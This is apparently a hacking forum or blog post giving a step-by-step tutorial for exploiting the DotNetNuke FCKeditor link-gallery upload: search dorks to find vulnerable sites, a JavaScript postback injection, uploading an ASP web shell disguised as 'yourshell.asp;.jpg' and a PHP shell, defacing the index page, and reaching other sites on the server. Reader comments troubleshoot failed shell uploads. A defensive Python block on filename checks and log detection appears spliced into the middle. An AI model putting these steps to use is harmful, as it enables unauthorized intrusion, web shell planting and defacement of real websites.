Hello everyone!!
I am going to tell you about the DotNetNuke exploit. I know some of you know about it, but it is a very good exploit to hack .NET sites. It is a fucking exploit. You can even hack all sites hosted on the same server. You can upload any file using it.
Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL injection and cross-site scripting.
What is DNN?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke mainly provides a Content Management System (CMS) for personal websites.
Here is a step-by-step tutorial:
Upload random file
Code:
*.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
step 1: use this dork to find a vulnerable site
Code:
inurl:home/tabid/36/language/en-US/Default.aspx
Code:
inurl:fcklinkgallery.aspx
inurl:/portals/0
step 2: now open any site like
Code:
http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx
so your URL will become
Code:
http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
and if you are lucky you will get this
step 3: Select the 3rd option [file]
step 4: inject the following JavaScript code in the browser address bar
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
step 4: Now just upload your file; for example, mine is z.txt. When it is uploaded we can see it in the root dir.
step 5: Navigate to
Code:
http://www.vulsite.com/portals/0/z.txt
You can see our file successfully uploaded.
method to upload shell:
Things you need:
An ASP shell
r57 or C99 Shell or any other shell
step 4: rename your ASP shell to
Code:
yourshell.asp;.jpg
step 5: Navigate to it through
Code:
http://www.vulsite.com/portals/0/yourshell.asp;.jpg
step 6: Now upload your PHP shell using the upload file option marked in the above image.
step 7: Navigate to it through
Code:
http://www.vulsite.com/portals/0/yourphpshell.php
Deface
step 8: Now replace your index.html with original index.html. That's it.
all sites in server
Well, you can hack all sites hosted on the same server.
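For defenders, an added example (not from the original post or from DotNetNuke): it shows why a check on only the final extension accepts the `yourshell.asp;.jpg` name used above while a whole-name allow-list rejects it, and it flags the post's request paths in an IIS W3C log. The function names, the script-extension list and the sample log are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Extensions the post lists as accepted by the upload dialog.
ALLOWED = set("""swf jpg jpeg jpe gif bmp png doc xls ppt pdf txt xml xsl css zip
3gp asf asx avi flv m4v mov mp4 mpe mpeg mpg ram rm rmvb wm wmv vob""".split())
# Script extensions followed by ';', '.', '/', '\' or end of name (assumed list).
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|ashx|php)(?=[;./\\]|$)", re.I)

def naive_ok(name):
    """Weak form: looks only at the text after the last dot."""
    return name.rsplit(".", 1)[-1].lower() in ALLOWED

def strict_ok(name):
    """Hardened form: safe characters, exactly one dot, allow-listed extension."""
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", name)
    return bool(m) and m.group(1).lower() in ALLOWED

def suspicious_requests(log_lines):
    """Flag hits on the link-gallery page and script-like names under /portals/."""
    fields, hits = [], []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # W3C header names the columns
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        path = unquote(row.get("cs-uri-stem", "")).lower()
        if path.endswith("/fcklinkgallery.aspx"):
            hits.append((row.get("c-ip"), path, "link-gallery page requested"))
        elif path.startswith("/portals/") and SCRIPT_EXT.search(path):
            hits.append((row.get("c-ip"), path, "script name in upload folder"))
    return hits

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 203.0.113.7 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 200
2024-01-01 10:00:09 203.0.113.7 GET /portals/0/z.txt 200
2024-01-01 10:00:30 203.0.113.7 GET /portals/0/yourshell.asp;.jpg 200
2024-01-01 10:01:00 198.51.100.4 GET /portals/0/logo.jpg 200""".splitlines()

if __name__ == "__main__":
    for n in ("z.txt", "yourshell.asp;.jpg", "yourphpshell.php"):
        print(n, "naive:", naive_ok(n), "strict:", strict_ok(n))
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```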
You Do Not Have Sufficient Permission To Write To Folder . Please Contact Your Hosting Provider To Ensure The Appropriate Security Settings Have Been Enabled On The Server.
Error when uploading File
Which browser are you using?
Use Opera
javascript:__doPostBack('ctlURL$cmdUpload','') This keeps redirecting me to the Google search page, showing me a tutorial instead of the Linked Gallery upload as explained and shown in the image example. Please help out
use opera
man nothing happen when i paste the code
after uploading my shell, I see nothing on the "./Portals/0/shell.asp;.jpg" page, I mean I see no shell getting executed, just a blank page in front of me, tell me what to do?
Good blogging.
Dotnetnuke Hosting
Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.
DotNet Nuke training in Electronic City